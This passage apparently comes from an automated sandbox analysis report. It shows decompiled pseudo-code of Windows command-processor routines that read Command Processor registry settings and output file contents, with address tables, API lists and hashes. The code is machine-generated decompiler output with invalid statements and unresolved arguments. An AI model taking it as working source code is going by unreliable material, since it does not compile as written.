					if(RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t139 =  &_v4104;
								__imp___wtol(_t139);
								asm("sbb al, al");
								 *0x1218528 =  ~(_t139 - 1) + 1;
							}
						} else {
							 *0x1218528 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					_t97 = RegQueryValueExW(_v4116, L"EnableExtensions", 0,  &_v4108,  &_v4104,  &_v4112);
					if(_t97 == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t135 =  &_v4104;
								__imp___wtol(_t135);
								asm("sbb al, al");
								 *0x1213cc9 =  ~(_t135 - 1) + 1;
							}
						} else {
							 *0x1213cc9 = _v4104 != _t97;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DelayedExpansion", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t131 =  &_v4104;
								__imp___wtol(_t131);
								asm("sbb al, al");
								 *0x1213cc8 =  ~(_t131 - 1) + 1;
							}
						} else {
							 *0x1213cc8 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DefaultColor", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
						L11:
						_v4112 = 0x1000;
						if(RegQueryValueExW(_v4116, L"CompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
							L19:
							_v4112 = 0x1000;
							if(RegQueryValueExW(_v4116, L"PathCompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
								_t114 =  *0x11fd0d4; // 0x20
								0x800 = 0x20;
								L27:
								_t146 =  *0x11fd0d8; // 0x20
								if(_t146 != 0x800) {
									L29:
									if(_t189 == 0 && _t146 < 0x800) {
										 *0x11fd0d4 = _t146;
									}
									L31:
									_v4112 = 0x1000;
									if(RegQueryValueExW(_v4116, L"AutoRun", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
										if(_v4108 == 2) {
											_t159 = _v4112 >> 1;
											_t165 =  &_v4100 + _t159 * 2;
											if(ExpandEnvironmentStringsW( &_v4104,  &_v4100 + _t159 * 2, 0x7fe - _t159) == 0) {
												_v4104 = 0;
											} else {
												E011E1040( &_v4104, 0x800, _t165);
											}
											_t163 = _v4120;
										}
										if(_v4104 != 0) {
											 *_t162 = E011DDF40( &_v4104);
										}
									}
									_t88 = RegCloseKey(_v4116);
									goto L33;
								}
								_t189 = _t114 - 0x800;
								if(_t189 < 0) {
									 *0x11fd0d8 = _t114;
									goto L31;
								}
								goto L29;
							}
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									_t114 =  *0x11fd0d4; // 0x20
									goto L23;
								}
								_t114 = wcstol( &_v4104, 0, 0);
								_t167 = _t167 + 0xc;
								goto L22;
							} else {
								_t114 = _v4104;
								L22:
								 *0x11fd0d4 = _t114;
								L23:
								if(_t114 == 0) {
									0x800 = 0x20;
									L26:
									_t114 = 0x800;
									 *0x11fd0d4 = 0x800;
									goto L27;
								}
								_t151 = 0xd;
								0x800 = 0x20;
								if(_t114 == _t151 || _t114 > 0x800) {
									goto L26;
								} else {
									goto L27;
								}
							}
						}
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								_t127 =  *0x11fd0d8; // 0x20
								goto L15;
							}
							_t127 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L14;
						} else {
							_t127 = _v4104;
							L14:
							 *0x11fd0d8 = _t127;
							L15:
							if(_t127 == 0) {
								_t152 = 0x20;
								L18:
								 *0x11fd0d8 = _t152;
								goto L19;
							}
							_t153 = 0xd;
							_t152 = 0x20;
							if(_t127 == _t153 || _t127 > _t152) {
								goto L18;
							} else {
								goto L19;
							}
						}
					} else {
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								goto L11;
							}
							_t130 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L10;
						} else {
							_t130 = _v4104;
							L10:
							 *0x11fd5a0 = _t130;
							goto L11;
						}
					}
					L33:
					_t162 = _t162 + 4;
					_t163 = _t163 - 1;
					_v4120 = _t163;
					if(_t163 == 0) {
						__imp__time();
						srand(_t88);
						return E011E6FD0(_t88, _t144, _v8 ^ _t166, 0x800, _t162, _t163, 0);
					}
				}
			}



































                                                    0x011e41e7
                                                    0x011e41ec
                                                    0x011e41f3
                                                    0x011e41fb
                                                    0x011e41fd
                                                    0x011e420d
                                                    0x011e4217
                                                    0x011e4218
                                                    0x011e421f
                                                    0x011e4221
                                                    0x011e4227
                                                    0x011e423d
                                                    0x011e4245
                                                    0x00000000
                                                    0x00000000
                                                    0x011e424b
                                                    0x011e425e
                                                    0x011e4285
                                                    0x011ee517
                                                    0x011ee533
                                                    0x011ee539
                                                    0x011ee540
                                                    0x011ee54a
                                                    0x011ee54e
                                                    0x011ee54e
                                                    0x011ee519
                                                    0x011ee520
                                                    0x011ee520
                                                    0x011ee517
                                                    0x011e4291
                                                    0x011e42b7
                                                    0x011e42bf
                                                    0x011e42c8
                                                    0x011ee55f
                                                    0x011ee565
                                                    0x011ee56c
                                                    0x011ee576
                                                    0x011ee57a
                                                    0x011ee57a
                                                    0x011e42ce
                                                    0x011e42d4
                                                    0x011e42d4
                                                    0x011e42c8
                                                    0x011e42e1
                                                    0x011e430f
                                                    0x011ee58b
                                                    0x011ee5a7
                                                    0x011ee5ad
                                                    0x011ee5b4
                                                    0x011ee5be
                                                    0x011ee5c2
                                                    0x011ee5c2
                                                    0x011ee58d
                                                    0x011ee594
                                                    0x011ee594
                                                    0x011ee58b
                                                    0x011e431b
                                                    0x011e4349
                                                    0x011e4365
                                                    0x011e436b
                                                    0x011e4399
                                                    0x011e43d5
                                                    0x011e43db
                                                    0x011e4409
                                                    0x011ee65c
                                                    0x011ee664
                                                    0x011e444a
                                                    0x011e444a
                                                    0x011e4454
                                                    0x011e4463
                                                    0x011e4463
                                                    0x011e44f0
                                                    0x011e44f0
                                                    0x011e446e
                                                    0x011e4474
                                                    0x011e44a2
                                                    0x011ee67c
                                                    0x011ee68a
                                                    0x011ee69a
                                                    0x011ee6a7
                                                    0x011ee6be
                                                    0x011ee6a9
                                                    0x011ee6b5
                                                    0x011ee6b5
                                                    0x011ee6c5
                                                    0x011ee6c5
                                                    0x011ee6d3
                                                    0x011ee6e4
                                                    0x011ee6e4
                                                    0x011ee6d3
                                                    0x011e44ae
                                                    0x00000000
                                                    0x011e44ae
                                                    0x011e445a
                                                    0x011e445d
                                                    0x011ee66a
                                                    0x00000000
                                                    0x011ee66a
                                                    0x00000000
                                                    0x011e445d
                                                    0x011e4416
                                                    0x011ee62e
                                                    0x011ee649
                                                    0x00000000
                                                    0x011ee649
                                                    0x011ee63b
                                                    0x011ee641
                                                    0x00000000
                                                    0x011e441c
                                                    0x011e441c
                                                    0x011e4423
                                                    0x011e4423
                                                    0x011e4429
                                                    0x011e442c
                                                    0x011ee656
                                                    0x011e4442
                                                    0x011e4442
                                                    0x011e4444
                                                    0x00000000
                                                    0x011e4444
                                                    0x011e4434
                                                    0x011e4437
                                                    0x011e443b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e443b
                                                    0x011e4416
                                                    0x011e43a2
                                                    0x011ee5f9
                                                    0x011ee614
                                                    0x00000000
                                                    0x011ee614
                                                    0x011ee606
                                                    0x011ee60c
                                                    0x00000000
                                                    0x011e43a8
                                                    0x011e43a8
                                                    0x011e43af
                                                    0x011e43af
                                                    0x011e43b5
                                                    0x011e43b8
                                                    0x011ee621
                                                    0x011e43ce
                                                    0x011e43ce
                                                    0x00000000
                                                    0x011e43ce
                                                    0x011e43c0
                                                    0x011e43c6
                                                    0x011e43c7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e43c7
                                                    0x011e434b
                                                    0x011e4352
                                                    0x011ee5d3
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee5e4
                                                    0x011ee5ea
                                                    0x00000000
                                                    0x011e4358
                                                    0x011e4358
                                                    0x011e435f
                                                    0x011e435f
                                                    0x00000000
                                                    0x011e435f
                                                    0x011e4352
                                                    0x011e44b4
                                                    0x011e44b4
                                                    0x011e44b7
                                                    0x011e44ba
                                                    0x011e44c0
                                                    0x011e44c8
                                                    0x011e44cf
                                                    0x011e44e7
                                                    0x011e44e7
                                                    0x011e44c0

                                                    APIs
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 011E423D
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 011E427D
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 011E42B7
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 011E4307
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 011E4341
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 011E4391
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 011E4401
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 011E449A
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011E44AE
                                                    • time.MSVCRT ref: 011E44C8
                                                    • srand.MSVCRT ref: 011E44CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpensrandtime
                                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                    • API String ID: 145004033-3846321370
                                                    • Opcode ID: cce8405e04c4eb498425845ed1d54e268bfa5c9ea81bf0b4475f6d69d70143dc
                                                    • Instruction ID: ffefbe0cc6f0beff65443c48b02f25f17f1f507bba8bfdb992daab111572123b
                                                    • Opcode Fuzzy Hash: cce8405e04c4eb498425845ed1d54e268bfa5c9ea81bf0b4475f6d69d70143dc
                                                    • Instruction Fuzzy Hash: 0CC19735900669DADF3ACB94DD4CBD977B8FB08706F0040E6E689E2584DBB05AC4CF55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F65A0, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 52%
                                                    			E011F65A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
				void* _v0;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				WCHAR* _t150;
				void* _t155;
				long _t157;
				WCHAR* _t160;
				signed int _t161;
				WCHAR* _t164;
				void* _t172;
				long _t174;
				WCHAR* _t175;
				signed int _t176;
				WCHAR* _t178;
				long _t181;
				WCHAR* _t182;
				WCHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				long _t192;
				WCHAR* _t195;
				int _t197;
				void* _t198;
				WCHAR* _t199;
				void* _t202;
				WCHAR* _t206;
				long _t208;
				void* _t212;
				void* _t213;
				void* _t222;
				unsigned int _t226;
				WCHAR* _t228;
				void* _t232;
				unsigned int _t234;
				void* _t235;
				long _t245;
				int _t246;
				WCHAR* _t251;
				WCHAR* _t252;
				signed char* _t254;
				intOrPtr _t257;
				WCHAR* _t258;
				union _LARGE_INTEGER _t263;
				void* _t264;
				void* _t266;
				void* _t267;
				int _t268;
				WCHAR* _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;

				_t253 = __edx;
				_t274 = _t273 & 0xfffffff8;
				E011E8290(0x1074);
				_t137 =  *0x11fd0b4; // 0x1805bc26
				_a4204 = _t137 ^ _t274;
				_a56 = _a56 | 0xffffffff;
				_t262 = _a4;
				_a600 = 0x104;
				_a48 = _a4;
				_t266 = 0;
				_a52 = 0;
				_t212 = 1;
				_a20 = 0;
				_a60 = 0x7fffffff;
				_a32 = 0;
				_a36 = 0;
				_a40 = 1;
				_a592 = 0;
				_a596 = 1;
				memset( &_a72, 0, 0x104);
				_t275 = _t274 + 0xc;
				if(E011E0C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t253 = 0;
					_t263 = E011DD120(_t262, 0,  &_a72);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						L13:
						_a28 =  &_a608;
						_t150 = E011E0178( &_a608);
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 =  &_a60;
							__imp___get_osfhandle(_t202);
							_a56 = GetFileSize(_t202, _t263);
							__imp___get_osfhandle(0);
							SetFilePointer(0, _t263, 0, 0);
							_t30 =  &_a36;
							 *_t30 = _a36 & _t266;
							__eflags =  *_t30;
							_a32 = _t212;
						}
						while(1) {
							L15:
							__eflags =  *0x11fd544;
							if( *0x11fd544 != 0) {
								break;
							}
							_t155 =  &_a608;
							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
							_t222 = _t263;
							_t156 = ReadFile(_t155, ??, ??, ??, ??);
							__eflags = _t156;
							if(_t156 == 0) {
								L81:
								_t157 = GetLastError();
								_push(0);
								_push(_t157);
								 *0x1213cf0 = _t157;
								E011DC5A2(_t222);
								L82:
								E011DDB92(_t263);
								_t212 = 0;
								goto L87;
							}
							_t226 = _a4;
							__eflags = _t226;
							if(_t226 == 0) {
								goto L82;
							}
							__eflags = _a40;
							if(_a40 == 0) {
								L21:
								_a24 = _t226;
								__eflags = _t266;
								if(_t266 == 0) {
									L25:
									_t160 = E011E269C(_t156);
									__eflags = _t160;
									if(_t160 != 0) {
										L28:
										_t268 = _a4;
										_t254 =  &_a608;
										_t228 = _t268;
										__eflags = _t268;
										while(1) {
											_a12 = _t228;
											if(__eflags == 0) {
												break;
											}
											_t161 =  *_t254 & 0x000000ff;
											__eflags =  *((char*)(_t161 + 0x1217f30));
											if( *((char*)(_t161 + 0x1217f30)) == 0) {
												L31:
												_t254 =  &(_t254[1]);
												_t228 = _t228 - 1;
												__eflags = _t228;
												continue;
											}
											_t253 =  &(_t254[1]);
											_t228 = _t228 - 1;
											__eflags = _t228;
											_a12 = _t228;
											if(_t228 == 0) {
												_t198 =  &_a12;
												__imp___get_osfhandle(_t253, _t212, _t198, 0);
												_t222 = _t263;
												_t199 = ReadFile(_t198, ??, ??, ??, ??);
												__eflags = _t199;
												if(_t199 == 0) {
													goto L81;
												}
												_t268 =  &(_a4[0]);
												__eflags = _t268;
												_a4 = _t268;
												_a24 = _t268;
												L36:
												_a28 = _a28 & 0x00000000;
												_t253 =  &_a608;
												_t164 = E011F6CEF(_t212,  &_a608,  &_a24,  &_a28);
												__eflags = _t164;
												if(_t164 != 0) {
													L39:
													_t269 = MultiByteToWideChar( *0x1203854, 0,  &_a608, _t268,  &_a1128, 0x400);
													_a12 = _t269;
													__eflags = _t269;
													if(_t269 == 0) {
														_t269 = 0x400;
														_a12 = 0x400;
													}
													_t226 = _a4;
													_a28 =  &_a1128;
													L42:
													__eflags = _a40;
													if(_a40 != 0) {
														__eflags =  *0x1213cd0;
														if( *0x1213cd0 != 0) {
															E011DC5A2(_t226, 0x2354, _t212, _a48);
															_t226 = _a4;
															_t275 = _t275 + 0xc;
															_t269 = _a12;
														}
														_t75 =  &_a40;
														 *_t75 = _a40 & 0x00000000;
														__eflags =  *_t75;
													}
													_v0 = _a28;
													__eflags = _t269;
													if(_t269 <= 0) {
														L74:
														_t270 = _a32;
														_t253 = _a36;
														__eflags = _t270 | _t253;
														if((_t270 | _t253) != 0) {
															_t172 =  &_a32;
															__imp___get_osfhandle(_t172, _t212);
															SetFilePointerEx(_t172, _t263, 0, 0);
															_t253 = _a36;
															_t270 = _a32;
															_t226 = _a4;
														}
														__eflags = _t226 - _a24;
														if(_t226 != _a24) {
															goto L82;
														} else {
															__eflags = _a60 - _t253;
															if(__eflags < 0) {
																goto L82;
															}
															if(__eflags > 0) {
																L80:
																_t266 = _a20;
																goto L15;
															}
															__eflags = _a56 - _t270;
															if(_a56 <= _t270) {
																goto L82;
															}
															goto L80;
														}
													} else {
														do {
															_t174 = 0x50;
															__eflags = _t269 - _t174;
															if(_t269 <= _t174) {
																_a8 = _t269;
																__eflags = _t269;
																if(_t269 == 0) {
																	break;
																}
																L50:
																__eflags =  *0x11fd544;
																if( *0x11fd544 != 0) {
																	goto L86;
																}
																_t175 = E011E269C(_t174);
																__eflags = _t175;
																if(_t175 == 0) {
																	__eflags =  *0x121805c;
																	if( *0x121805c != 0) {
																		__eflags = _a20;
																		if(_a20 == 0) {
																			_t176 = _a8;
																			_t232 = _v0;
																			L62:
																			_a68 = _t176 + _t176;
																			_t178 = E011E27C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
																			__eflags = _a12;
																			_t257 = _v8;
																			_a36 = _t178;
																			if(_a12 != 0) {
																				 *((short*)(_a68 + _t257)) = _a52;
																			}
																			_t234 = _a16;
																			_t269 = _t269 - (_t234 >> 1);
																			_t181 = _a8;
																			_t258 = _t257 + _t234;
																			__eflags = _t258;
																			_v0 = _t258;
																			L65:
																			_t253 = _a44;
																			L66:
																			__eflags = _t253;
																			if(_t253 == 0) {
																				L68:
																				_t182 = GetLastError();
																				 *0x1213cf0 = _t182;
																				__eflags = _t182;
																				if(_t182 == 0) {
																					 *0x1213cf0 = 0x70;
																				}
																				_t235 = _t212;
																				_t183 = E011E0178(_t182);
																				__eflags = _t183;
																				if(_t183 == 0) {
																					_t236 = _t212;
																					_t184 = E011F9953(_t183, _t212);
																					__eflags = _t184;
																					if(_t184 == 0) {
																						E011F985A( *0x1213cf0);
																					} else {
																						_push(0);
																						_push(0x2364);
																						E011DC5A2(_t236);
																					}
																					goto L86;
																				} else {
																					_push(0);
																					_push(0x1d);
																					E011DC5A2(_t235);
																					goto L72;
																				}
																			}
																			__eflags = _t234 - _t181 + _t181;
																			if(_t234 == _t181 + _t181) {
																				goto L72;
																			}
																			goto L68;
																		}
																		L60:
																		_t176 = _a8;
																		_t232 = _v0;
																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
																		 *(_t232 + _t176 * 2) = 0;
																		goto L62;
																	}
																	__eflags = _a20;
																	if(_a20 != 0) {
																		goto L60;
																	}
																	_t190 = _a8;
																	L58:
																	__imp___get_osfhandle(0);
																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
																	_t192 = _a16;
																	_t269 = _t269 - _t192;
																	_v0 = _v0 + _t192;
																	_t234 = _t192 + _t192;
																	_t181 = _a8;
																	_a16 = _t234;
																	goto L66;
																}
																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
																_a44 = _t195;
																__eflags = _t195;
																_t190 = _a8;
																if(_t195 == 0) {
																	goto L58;
																}
																_t245 = _a16;
																__eflags = _t245 - _t190;
																if(_t245 != _t190) {
																	goto L58;
																}
																_t269 = _t269 - _t245;
																_t234 = _t245 + _t245;
																_v0 = _v0 + _t234;
																_a16 = _t234;
																goto L65;
															}
															_a8 = _t174;
															goto L50;
															L72:
															__eflags = _t269;
														} while (_t269 > 0);
														_t226 = _a4;
														goto L74;
													}
												}
												_t197 = _a24;
												__eflags = _t197;
												if(_t197 == 0) {
													goto L82;
												}
												_t268 = _t197;
												goto L39;
											}
											goto L31;
										}
										goto L36;
									}
									__eflags =  *0x121805c - _t160;
									if( *0x121805c != _t160) {
										goto L28;
									}
									_t226 = _a4;
									_t269 = _t226;
									L23:
									_a12 = _t269;
									goto L42;
								}
								_t269 = _t226 >> 1;
								__eflags = _t269;
								goto L23;
							}
							_t156 = 0xfeff;
							__eflags = _a608 - 0xfeff;
							if(_a608 != 0xfeff) {
								_t45 =  &_a20;
								 *_t45 = _a20 & 0x00000000;
								__eflags =  *_t45;
								_a24 = _t226;
								goto L25;
							}
							_t246 = _t226 - 2;
							__eflags = _t246;
							_a4 = _t246;
							_t266 = _t212;
							_a20 = _t266;
							_t156 = memmove( &_a608,  &_a610, _t246);
							_t226 = _a4;
							_t275 = _t275 + 0xc;
							goto L21;
						}
						L86:
						E011DDB92(_t263);
						goto L87;
					}
					_t206 = E011E3320(L"DPATH");
					__eflags = _t206;
					if(_t206 == 0) {
						L11:
						_t250 =  *0x1213cf0;
						__eflags =  *0x1213cf0 - 0x7b;
						if( *0x1213cf0 == 0x7b) {
							_t250 = 2;
							 *0x1213cf0 = _t250;
						}
						goto L2;
					}
					_t251 = _a592;
					__eflags = _t251;
					if(_t251 == 0) {
						_t251 =  &_a72;
					}
					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
					__eflags = _t208;
					if(_t208 == 0) {
						goto L11;
					}
					_t252 = _a592;
					__eflags = _t252;
					if(_t252 == 0) {
						_t252 =  &_a72;
					}
					_t253 = 0;
					_t263 = E011DD120(_t252, 0, _t252);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t250 = 8;
					L2:
					E011F985A(_t250);
					L87:
					__imp__??_V@YAXPAX@Z(_a592);
					_pop(_t264);
					_pop(_t267);
					_pop(_t213);
					return E011E6FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
				}
			}


























































                                                    0x011f65a0
                                                    0x011f65a5
                                                    0x011f65ad
                                                    0x011f65b2
                                                    0x011f65b9
                                                    0x011f65c0
                                                    0x011f65ca
                                                    0x011f65d3
                                                    0x011f65e1
                                                    0x011f65e5
                                                    0x011f65e7
                                                    0x011f65eb
                                                    0x011f65ec
                                                    0x011f65f1
                                                    0x011f65f9
                                                    0x011f65fd
                                                    0x011f6601
                                                    0x011f6605
                                                    0x011f660c
                                                    0x011f6613
                                                    0x011f661e
                                                    0x011f663e
                                                    0x011f664e
                                                    0x011f6657
                                                    0x011f6659
                                                    0x011f665c
                                                    0x011f66cd
                                                    0x011f66d6
                                                    0x011f66da
                                                    0x011f66df
                                                    0x011f66e1
                                                    0x011f66e3
                                                    0x011f66e9
                                                    0x011f66f7
                                                    0x011f6701
                                                    0x011f6709
                                                    0x011f670f
                                                    0x011f670f
                                                    0x011f670f
                                                    0x011f6713
                                                    0x011f6713
                                                    0x011f6717
                                                    0x011f6717
                                                    0x011f6717
                                                    0x011f671e
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6730
                                                    0x011f6739
                                                    0x011f673f
                                                    0x011f6741
                                                    0x011f6747
                                                    0x011f6749
                                                    0x011f6aad
                                                    0x011f6aad
                                                    0x011f6ab3
                                                    0x011f6ab5
                                                    0x011f6ab6
                                                    0x011f6abb
                                                    0x011f6ac2
                                                    0x011f6ac4
                                                    0x011f6ac9
                                                    0x00000000
                                                    0x011f6ac9
                                                    0x011f674f
                                                    0x011f6753
                                                    0x011f6755
                                                    0x00000000
                                                    0x00000000
                                                    0x011f675b
                                                    0x011f6760
                                                    0x011f679c
                                                    0x011f679c
                                                    0x011f67a0
                                                    0x011f67a2
                                                    0x011f67ba
                                                    0x011f67bc
                                                    0x011f67c1
                                                    0x011f67c3
                                                    0x011f67d5
                                                    0x011f67d5
                                                    0x011f67d9
                                                    0x011f67e0
                                                    0x011f67e2
                                                    0x011f6800
                                                    0x011f6800
                                                    0x011f6804
                                                    0x00000000
                                                    0x00000000
                                                    0x011f67e6
                                                    0x011f67e9
                                                    0x011f67f0
                                                    0x011f67fc
                                                    0x011f67fc
                                                    0x011f67fd
                                                    0x011f67fd
                                                    0x00000000
                                                    0x011f67fd
                                                    0x011f67f2
                                                    0x011f67f3
                                                    0x011f67f3
                                                    0x011f67f6
                                                    0x011f67fa
                                                    0x011f680a
                                                    0x011f6812
                                                    0x011f6818
                                                    0x011f681a
                                                    0x011f6820
                                                    0x011f6822
                                                    0x00000000
                                                    0x00000000
                                                    0x011f682c
                                                    0x011f682c
                                                    0x011f682d
                                                    0x011f6831
                                                    0x011f6835
                                                    0x011f6835
                                                    0x011f6846
                                                    0x011f684d
                                                    0x011f6852
                                                    0x011f6854
                                                    0x011f6864
                                                    0x011f6888
                                                    0x011f688a
                                                    0x011f688e
                                                    0x011f6890
                                                    0x011f6892
                                                    0x011f6897
                                                    0x011f6897
                                                    0x011f689b
                                                    0x011f68a6
                                                    0x011f68aa
                                                    0x011f68aa
                                                    0x011f68af
                                                    0x011f68b1
                                                    0x011f68b8
                                                    0x011f68c4
                                                    0x011f68c9
                                                    0x011f68cd
                                                    0x011f68d0
                                                    0x011f68d0
                                                    0x011f68d4
                                                    0x011f68d4
                                                    0x011f68d4
                                                    0x011f68d4
                                                    0x011f68dd
                                                    0x011f68e1
                                                    0x011f68e3
                                                    0x011f6a5d
                                                    0x011f6a5d
                                                    0x011f6a63
                                                    0x011f6a67
                                                    0x011f6a69
                                                    0x011f6a6c
                                                    0x011f6a76
                                                    0x011f6a7e
                                                    0x011f6a84
                                                    0x011f6a88
                                                    0x011f6a8c
                                                    0x011f6a8c
                                                    0x011f6a90
                                                    0x011f6a94
                                                    0x00000000
                                                    0x011f6a96
                                                    0x011f6a96
                                                    0x011f6a9a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6a9c
                                                    0x011f6aa4
                                                    0x011f6aa4
                                                    0x00000000
                                                    0x011f6aa4
                                                    0x011f6a9e
                                                    0x011f6aa2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6aa2
                                                    0x011f68e9
                                                    0x011f68e9
                                                    0x011f68eb
                                                    0x011f68ec
                                                    0x011f68ee
                                                    0x011f68f6
                                                    0x011f68fa
                                                    0x011f68fc
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6902
                                                    0x011f6902
                                                    0x011f6909
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6911
                                                    0x011f6916
                                                    0x011f6918
                                                    0x011f695d
                                                    0x011f6964
                                                    0x011f69a5
                                                    0x011f69aa
                                                    0x011f69c4
                                                    0x011f69c8
                                                    0x011f69cc
                                                    0x011f69d5
                                                    0x011f69dc
                                                    0x011f69e1
                                                    0x011f69e6
                                                    0x011f69ea
                                                    0x011f69ee
                                                    0x011f69f8
                                                    0x011f69f8
                                                    0x011f69fc
                                                    0x011f6a04
                                                    0x011f6a06
                                                    0x011f6a0a
                                                    0x011f6a0a
                                                    0x011f6a0c
                                                    0x011f6a10
                                                    0x011f6a10
                                                    0x011f6a14
                                                    0x011f6a14
                                                    0x011f6a16
                                                    0x011f6a1e
                                                    0x011f6a1e
                                                    0x011f6a24
                                                    0x011f6a29
                                                    0x011f6a2b
                                                    0x011f6a2d
                                                    0x011f6a2d
                                                    0x011f6a37
                                                    0x011f6a39
                                                    0x011f6a3e
                                                    0x011f6a40
                                                    0x011f6acd
                                                    0x011f6acf
                                                    0x011f6ad4
                                                    0x011f6ad6
                                                    0x011f6aee
                                                    0x011f6ad8
                                                    0x011f6ad8
                                                    0x011f6ada
                                                    0x011f6adf
                                                    0x011f6ae5
                                                    0x00000000
                                                    0x011f6a46
                                                    0x011f6a46
                                                    0x011f6a48
                                                    0x011f6a4a
                                                    0x00000000
                                                    0x011f6a50
                                                    0x011f6a40
                                                    0x011f6a1a
                                                    0x011f6a1c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6a1c
                                                    0x011f69ac
                                                    0x011f69ac
                                                    0x011f69b0
                                                    0x011f69b8
                                                    0x011f69be
                                                    0x00000000
                                                    0x011f69be
                                                    0x011f6966
                                                    0x011f696b
                                                    0x00000000
                                                    0x00000000
                                                    0x011f696d
                                                    0x011f6971
                                                    0x011f697e
                                                    0x011f698c
                                                    0x011f698e
                                                    0x011f6992
                                                    0x011f6994
                                                    0x011f6998
                                                    0x011f699b
                                                    0x011f699f
                                                    0x00000000
                                                    0x011f699f
                                                    0x011f6932
                                                    0x011f6938
                                                    0x011f693c
                                                    0x011f693e
                                                    0x011f6942
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6944
                                                    0x011f6948
                                                    0x011f694a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f694c
                                                    0x011f694e
                                                    0x011f6950
                                                    0x011f6954
                                                    0x00000000
                                                    0x011f6954
                                                    0x011f68f0
                                                    0x00000000
                                                    0x011f6a51
                                                    0x011f6a51
                                                    0x011f6a51
                                                    0x011f6a59
                                                    0x00000000
                                                    0x011f6a59
                                                    0x011f68e3
                                                    0x011f6856
                                                    0x011f685a
                                                    0x011f685c
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6862
                                                    0x00000000
                                                    0x011f6862
                                                    0x00000000
                                                    0x011f67fa
                                                    0x00000000
                                                    0x011f6806
                                                    0x011f67c5
                                                    0x011f67cb
                                                    0x00000000
                                                    0x00000000
                                                    0x011f67cd
